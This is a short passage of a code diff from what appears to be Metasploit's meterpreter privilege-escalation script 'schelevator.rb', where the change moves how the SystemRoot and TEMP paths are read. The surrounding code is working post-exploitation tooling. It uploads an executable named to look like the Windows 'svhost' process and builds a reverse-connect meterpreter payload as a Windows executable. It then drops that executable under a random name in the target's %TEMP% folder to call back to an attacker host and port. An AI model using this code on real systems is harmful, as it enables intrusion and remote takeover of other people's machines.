fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")

9
scripts/meterpreter/schelevator.rb
View File

@ -99,6 +99,10 @@ upload_fn = nil
end
}
envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = envs['SystemRoot']
tmpdir = envs['TEMP']
# Must have at least one of -c or -u
if not cmd and not upload_fn
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@ -110,9 +114,8 @@ if not cmd and not upload_fn
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
#and placing it on the target in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
cmd = tempdir + "\\" + tempexename + ".exe"
cmd = tmpdir + "\\" + tempexename + ".exe"
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
fd = client.fs.file.new(cmd, "wb")
fd.write(exe)
@ -139,8 +142,6 @@ end
#
# Upload the payload command if needed
#
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
if upload_fn
begin
location = tmpdir.dup

Some files were not shown because too many files have changed in this diff Show More